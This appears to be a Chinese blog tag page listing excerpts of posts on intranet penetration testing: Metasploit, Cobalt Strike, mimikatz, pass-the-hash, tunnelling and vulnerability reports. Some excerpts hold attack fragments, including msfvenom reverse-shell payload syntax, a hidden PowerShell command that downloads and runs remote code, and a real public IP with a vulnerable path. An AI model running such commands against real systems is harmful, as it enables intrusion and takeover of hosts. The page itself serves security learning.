#内网渗透

20199118《网络攻防实践》第四周作业

网络嗅探基本介绍网络嗅探利用计算机的网络接口截获目的地址为其他计算机的数据报文,以监听数据流中所包含的私密信息;实现网络嗅探技术的工具称为网络嗅探器;截获到的是经过封包的二进制数据,通常会结合网络协议分析技术来解析嗅探到的网络数据;网络嗅探是攻击者经常使用的内网渗透技术
陈剑源·2020-03-24 19:00

20199114 2019-2020-2 《网络攻防实践》第四周作业

201991142019-2020-2《网络攻防实践》第四周作业一、实验内容1.网络嗅探1.1概述DEF:网络嗅探(Sniff)作为攻击者经常使用的内网渗透技术,通常在攻击者获得内部网络中一台主机的访问权后实施
王昱皓·2020-03-24 15:00

用Powershell框架Empire进行内网域渗透(一)

前言自从powershell在windows开始预装之后,就成为Windows内网渗透的好帮手,好处多多:天生免杀、无文件落地、无日志(雾)。
jjf012·2020-03-23 20:59

ssh隧道用于调试

相关阅读SSH隧道与端口转发及内网渗透|个人博客SSH隧道技术----端口转发,socket代理|博客园SSH隧道使用参数ssh[N,f,L,R,D,C,g][user@ip]N告诉SSH客户端,这个链接不需要执行任何操作
bigpangl·2020-03-17 09:22

内网渗透思考(实践)

工具简介NmapNmap(网络映射器)是一款用于网络发现和安全审计的网络安全工具,它是自由软件。软件名字Nmap是NetworkMapper的简称。Nmap最初是由Fyodor在1997年开始创建的。随后在开源社区众多的志愿者参与下,该工具逐渐成为最为流行安全必备工具之一。一般情况下,Nmap用于列举网络主机清单、管理服务升级调度、监控主机或服务运行状况。Nmap可以检测目标机是否在线、端口开放情
Hunter-J·2020-03-16 23:00

2017网络渗透资料大全单——工具篇(上)

本篇工具类网络渗透资料包括渗透测试系统版本、漏洞扫描器、网络工具、xss扫描器、企业网络自检、webshell检测、内网渗透、中间件扫描/指纹识别类、专用扫描器、SSL分析工具、无线网络工具、子域名枚举工具
威客安全·2020-03-16 01:18

内网渗透防御:如何防御Hash注入攻击

渗透测试人员对Pass-the-Hash(PtH)攻击都很熟悉。我们常在渗透测试中用到它。如果你的职责包括网络入侵防御,你至少应该了解其攻击方法。不管你有多少经验,你对问题了解得可能不深,或许还不知道它是怎么解决的,注意是“解决”而不是“修复”。概述攻击者通过一定办法获取了Windows计算机的本地管理员权限,可以在内存中寻找其它本地或域内账户登录后的hash,因为电脑正在运行。这些hash可以“
CanMeng·2020-03-06 08:33

简单模拟三层内网渗透

0X01设置三张独立网卡简单的网路拓扑图0X02按照上面的网络拓扑图设置IP0X03实验背景:已经拿下Ubuntu的webshell的情况下进行进入会话,查看网络环境,发现还有个网段地址192.168.220.0/240X04第二层网络探索利用第一层的meterpreter添加第二层的路由:然后利用msf进行第二层网络存活主机扫描:切换到扫描模块useauxiliary/scanner/disco
我要变超人·2020-02-22 17:00

彻底理解windows 2

Net-NTLMHash:NTLMv1的主要加密算法是DES,NTLMv2的主要加密算法是HMAC-MD5.PassTheHash(哈希传递)在内网渗透
小阔爱·2020-02-19 18:00

黑客?网络安全之理论指导总概述(SQL/XSS)02

网络安全之理论指导总概述(SQL/XSS)一.传统攻击流程,大致有以下几种漏洞探察,端口扫描攻击外部入口内网渗透下载tu
凌志AI·2020-02-15 07:20

2020-01-31

第一章内网渗透测试基础记录时间:2020.1.240x01基础知识一、基本概念工作组:给成千上万台计算机编组,方便管理加入工作组的方法:右击桌面上的“计算机”图标,在弹出的快捷菜单出选择“属性”选项,然后单击
OneTrackMi_257f·2020-02-12 14:56

msf学习笔记1.入侵WindowsXP系统

这几天看了几篇msf内网渗透,shadon入侵摄像头,入侵安卓机的文章,觉得msf确实是一款利器。有人说msf的出现让任何人都可以成为黑客,因此打算这几天学习一下。
0xBryant24·2020-02-11 07:00

无线网安全之内网渗透

随着无线网络走进我们的生活,在方便了我们的同时又产生了许多的安全问题。如果你不加任何防范的话,无疑是向黑客敞开了大门。黑客一旦入侵了你的无线网,就可以在你毫无察觉的情况下监听你网络的一举一动,你的账号密码等等一切个人信息将暴露给黑客。下面,我就来演示一下,无线网是如何被入侵并监听的。首先我们需要一台装有Kalilinux系统的攻击机,还需要一个外置的无线网卡。我这里用的是RT3070L芯片的免驱动
无穷369·2020-02-07 23:41

内网渗透之Responder与Net-NTML hash

原文链接:http://wyb0.com/posts/responder-and-ntml-hash/0x00一些概念Windows认证协议分为:基于NTML的认证和基于kerberos的认证什么是NTLMHash?早期IBM设计的LMHash算法存在弱点,微软在保持向后兼容性的同时提出了自己的挑战响应机制,即NTLMHash什么是Challenge-Response挑战/响应验证机制?Clien
reber·2020-02-05 19:42

内网渗透之权限维持 - MSF

年初九天公生0x034MSF(美少妇)启动msfmsfconsole先启动msf依赖的postgresql数据库初始化数据库msfdbinit(要用普通用户)msf路径/usr/share制作后门msfvenommsfvenom-ppayload脚本lhost=监听/攻击机iplport=端口-f文件类型-o文件名linux示例msfvenom-plinux/x64/meterpreter/rev
#君焰·2020-02-02 01:00

内网渗透靶机演练

靶场:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/参考:https://www.anquanke.com/post/id/189940第一次做关于内网渗透的靶场所以记录一下
JKding233·2020-01-30 13:00

内网渗透之权限维持 - MSF与cs联动

年初六六六六MSF和cs联动msf连接cs1.在队伍服务器上启动cs服务端./teamserver团队服务器ip连接密码2.cs客户端连接攻击机填团队服务器ip和密码,名字随便msf将session发往cs客户端1.cs设置监听监听器-add选择payload类型和填攻击机ip,端口要对应payload类型2.进入payload注入模块useexploit/windows/local/payloa
#君焰·2020-01-30 00:00

记一次内网渗透中的sql注入

1.sql注入漏洞漏洞等级:高危漏洞位置:基础资料>汛限水位信息功能>漏洞描述:恶意攻击者可通过SQL注入漏洞构造SQL注入语句,对服务器端返回特定的错误信息来获取有利用价值的信息,甚至可篡改数据库中的内容并进行提漏洞验证:虽然没拿到太多有用的东西,但是基本确定了sql注入的存在,鉴于时间因素没有拿sqlmap跑,到这吧修复建议:对产生漏洞模块的传入参数进行有效性检测,对传入的参数进行限定当用户输
活的admin·2020-01-08 14:00

深圳某信息系统的多处高危漏洞-内网渗透

1.任意文件上传漏洞等级:高危漏洞位置:>基础资料>工程图纸管理>新增工程图纸>漏洞描述:任意文件上传,没有进行权限和文件类型限制,可直接获取系统最高权限漏洞验证:该处仅在客户端做了上传文件后缀核验,利用burp抓包修改文件后缀.jpg为.jsp可执行ipconfig止修复建议:针对文件上传漏洞的特点和必须具备的三个条件,我们阻断任何一个条件就可以达到组织文件上传攻击的目的:1、最有效的,将文件上
活的admin·2020-01-08 14:00

某水务局河道内网渗透经历

未授权访问(已通报修复)漏洞等级:高危漏洞描述:未授权访问漏洞,是在攻击者没有获取到登录权限或未授权的情况下,或者不需要输入密码,即可通过直接输入网站控制台主页面地址,或者不允许查看的链接便可进行访问,同时进行操作。漏洞位置:http://61.144.224.204:8080/rbs/map.jsp漏洞验证:访问http://61.144.224.204:8080/rbs/permissionM
活的admin·2020-01-08 14:00

icmp隧道

内网渗透时,如果防火墙只允许ICMP流量通过,可以使用ICMP隧道技术。缺点:需要root/administrator权限。
Instu·2020-01-07 23:30

【渗透神器系列】Metasploit

hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io今天玩了一把内网渗透,其中主要用到了metasploit这款内网渗透神器。
鲸息_Leon·2020-01-07 12:43

2019-01-20

微信公众号开发内网渗透常用工具+超详细操作步骤前段时间接触到微信公众号开发,需要做外网映射,就是需要把本地服务映射到外网,微信web开发工具才能访问到部署到tomcat的应用。
waliuliu·2020-01-06 07:44

内网渗透实战技巧

目录拿下Web服务器phpmyadmin后台getshell后渗透第一步派生CobaltStrike权限获得System权限获取账号密码远程桌面登录添加路由、挂Socks4a代理域信息收集内网主机信息收集内网存活主机探测内网存活主机端口扫描内网存活主机服务探测内网横向渗透攻击技巧MS17-010CVE-2019-0708psexec攻击哈希传递攻击MS14-068本文章是关于内网方面渗透技巧的一个
谢公子·2020-01-02 10:54

2020 目标

2020目标每个月写月总结代码能力提升python能独自写项目(熟练使用flask,django,爬虫)php语言熟练运用xss漏洞100个sql注入100个代码审计100个中小型cms内网渗透学习拿到
天下大木头·2020-01-01 23:00

内网渗透中mimikatz的使用

0x01简介mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单0x02测试环境网络资源管理模式:域已有资源:域内一台主机权限操作系统:win7x64域权限:普通用户0x03测试目标
AlexMercer313·2019-12-27 07:24

Powersploit在内网渗透中的使用

转自:www.freebuf.com/sectool/131275.htmlpowershell绕过执行策略限制本地权限绕过执行本地隐藏权限绕过执行脚本直接用IEX下载远程的PS1脚本回来权限绕过执行powersploitpowersploit一款基于powershell的后渗透(Post-Exploitation)框架,集成大量渗透相关模块和功能。github地址:https://github.
sum3mer·2019-12-24 03:40

内网渗透-命令行渗透

内网渗透时,如果登录远程桌面,容易暴露自己,所以还是尽可能使用命令行操作比较好建立ipc连接netuse\\[ip]/u:[域名][用户][密码]例:netuse\\192.168.83.10/u:TEST
nohands_noob·2019-12-21 23:17

cnblogs:内网渗透的一些工具和平台汇总

各位老司机在日常的渗透过程中,都会有自己趁手的工具集合,有开源的有私有的,不管什么样的工具组合,能够达到最佳的渗透效果就是好工具,老司机分享一点自己在内网渗透中惯用的开源工具和平台。
AlexMercer313·2019-12-21 22:54

Interview experience

变成电话面试一面自我介绍在实习公司干什么(挖了什么洞)记忆深刻的渗透测试经历SQL注入原理、利用、防范orderby原理waf绕过方法如何判断存在SQL注入熟悉哪种数据库MSSQL执行系统命令如何获得web服务绝对路径xxe内网渗透
hea1er·2019-12-20 10:38

内网渗透环境搭建

域控制器搭建操作系统:windowsserver2019打开服务器控制器,仪表板>添加角色和功能,在服务器角色中勾选ActiveDirectory域服务,然后开始安装需要的东西安装完成后选择升级为域控添加新林,域名为test.com输入密码然后一路下一步到路径,这些文件路径默认就好然后检查先决条件满足就开始安装了安装完成后会自动重启重启完成后发现已经加入域加入域操作系统:windowsserver
nohands_noob·2019-12-16 20:20

【Kali】内网渗透工具使用

很久没做内网渗透了,再次使用时发现工具不会用了~~好尴尬写个笔记记下吧~以后忘了能随时翻翻~~reGeorgSocksProxypythonreGeorgSocksProxy.py-l0.0.0.0-p2333
是Jonathan·2019-12-16 10:23

利用Office模版共享进行内网渗透攻击

通过对Office可以引用局域网中的某台机器上的共享模版这一功能进行测试分析发现,如果把模版文件替换成一个恶意的文档,比如带有宏病毒或者带有漏洞的文档,那么,在局域网中的其他机器上打开引用了模版文件的正常文档的话,里面的漏洞可以触发执行,捆绑的恶意代码也会跟着执行。因此,可以利用这种方法来对内网进行渗透攻击。攻击者在拿下的WEB服务器上建立共享目录,在共享目录下放置带有漏洞的文档作为后续需要使用的
Su2Root·2019-12-16 02:08

即可安全:内网渗透

因为这个,发现了自己对渗透知识的缺失,因此用了两周左右的时间学习补充了一下内网渗透的知识,看了不少大牛的文章,膜拜之余还是做了一些笔记的。
AlexMercer313·2019-12-15 21:22

某师范大学新闻传媒系统命令执行到内网渗透

漏洞地址:http://xxxx.xxxx.com返回DNSLOG成功反弹shellroot权限MSF上线扫描端口[+]172.18.27.206:-172.18.27.206:22-TCPOPEN[+]172.18.27.206:-172.18.27.206:8002-TCPOPEN[+]172.18.27.206:-172.18.27.206:8001-TCPOPEN[+]172.18.27.
时光与她Time·2019-12-14 16:01

内网渗透

0x00:内网中信息收集1:ipconfig/all:查看目标机网卡信息,例如双网卡网络信息等等2:systeminfo:查看系统信息,主要看补丁情况,可以配合windows-suggestion-exploit进行exp找寻3:tasklist-svc:-svc显示正在运行任务对应的服务名称4:wmicqfelistfull:获取系统打的补丁5:netshare:获取本地默认共享的资源6:net
Tkitn·2019-12-13 15:00

黑客攻防:Android安卓内网渗透攻击

P2P终结者大家应该都知道了,那时候的神器,局域网控制所有机器的网速。现在上了50M、甚至100M的光纤。虽然带宽不再想当年那样“憋屈”,但是由于不速蹭网,各种万能钥匙,被人破解,一个个经常来蹭你网络,你还不知道,所以网络越来越卡。在Android平台上能不能找到一枚类似P2P终结者一样的网络管理神器呢?GitHub上找到了一款国产的内网安全测试工具,而且是开源APP。虽然功能有限,但麻雀虽小五脏
花无涯·2019-12-07 10:37

2018-05-07(旧文整理)企业信息安全建设

对企业信息系统的攻击不再局限于简单的病毒传播或是粗暴的DDoS[注2],而是包含了由内网渗透,内网漫游,数据窃取,系统破坏等一系列攻击方式组成的高级持续攻击(APT[注1])。攻击的组织也从无组织的
杨廣xiang·2019-12-01 13:08

网络嗅探

1、(1)Why要内网渗透:安全机制严,正面突破难;内网间信任,攻击更容易。(2)内网渗透技术:嗅探、假消息攻击(3)嗅探Sniff技术是网络中的窃听。
minlover·2019-11-30 21:07

网络安全攻防靶机

如果您留意本博客的所有文章的话一定会发现:)web靶机:bwapppikachu-masterDVWA-masterphpcms数据库文件环境直接百度搜导入导出命令其他靶机直接github搜内网渗透:这个不需要明示靶机环境了吧
一次保护十个·2019-11-17 01:00

Metasploit魔鬼训练营渗透测试(攻防演示环境)

目录环境搭建攻击场景寻找外部入口突破内网渗透代理隧道内部横向渗透攻击总结环境搭建参照《Metasploit渗透测试魔鬼训练营》第二章进行环境搭建。
zhenx1n·2019-11-07 09:55

黑客入侵日记: Meterpreter免杀内网渗透第二章

黑客入侵日记:Meterpreter免杀内网渗透第二章请点击此处输入图片描述这里再介绍一种,生成反弹shell的方式。就是直接以raw的形式保存成文件只要目标进行了访问,就会反弹回shell。
花无涯·2019-10-31 15:51

假消息攻击

是一种内网渗透方法。(1)TCP/IP协议的设计缺陷①缺乏有效的信息加密机制,通信内容容易被第三方截获。②缺乏有效的身份鉴别和认证机制,通信双方无法确认彼此的身份。
minlover·2019-10-31 07:49

zabbix漏洞

1:Zabbix配置不当安全事件①案例事件sohu的zabbix,可导致内网渗透http://wy.zone.ci/bug_detail.php?
一颗小豆子·2019-10-23 22:00

msf反弹shell内网渗透

用法示例:1.msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=lport=-fpsh-reflection-oxx.ps1//生成文件放在目标机目录下//powershell执行脚本:powershell-windowstylehidden-execbypassIEX(New-ObjectNet.WebClient).DownloadStrin
OKAY_TC·2019-10-16 11:50

LCX使用心得

最近在搞内网渗透,碰到端口转发&边界处理的时候,我们就可以借助一些小工具了,这类工具有很多,这里主要说明lcx的用法。lcx是个很老的端口转发工具,而它的使用也很简单。
Awrrays·2019-09-25 21:00

巧用python和libnmapd,提取Nmap扫描结果

每当我进行内网渗透面对大量主机和服务时,我总是习惯使用自动化的方式从nmap扫描结果中提取信息。
·2019-09-25 06:15

ew做代理 进一步内网渗透

0x00前言最近搞站的时候有内网穿透的需求,大佬向我推荐了EW,本文模拟一个攻击场景对Earthworm的使用方法做一个简单的介绍。其实相应的内容EW的官网已经说得很详细了,我这里纯粹是作为个人笔记从如下几个方面做一个简单的记录:1、如何使用EW做反向Socks5代理2、浏览器如何设置Socks5代理访问目标内网Web服务3、利用proxychains给终端设置Socks5代理(方便将本地命令行工
潜心学习的小菜狗·2019-09-10 22:00

科普_DLL劫持原理与实践

至于为什么专门抓起来再学一遍了,唉,内网渗透需要0x01什么是DLL这里先摘抄一下百度百科的解释:DLL(DynamicLinkLibrary)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型
K'illCode·2019-09-08 11:23

科普_DLL劫持原理与实践

至于为什么专门抓起来再学一遍了,唉,内网渗透需要0x01什么是DLL这里先摘抄一下百度百科的解释:DLL(DynamicLinkLibrary)文件为动态链接库文件,又称“应用程序拓展”,是软件文件类型
K'illCode·2019-09-08 11:23
上一页 15 16 17 18 19 20 21 22 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他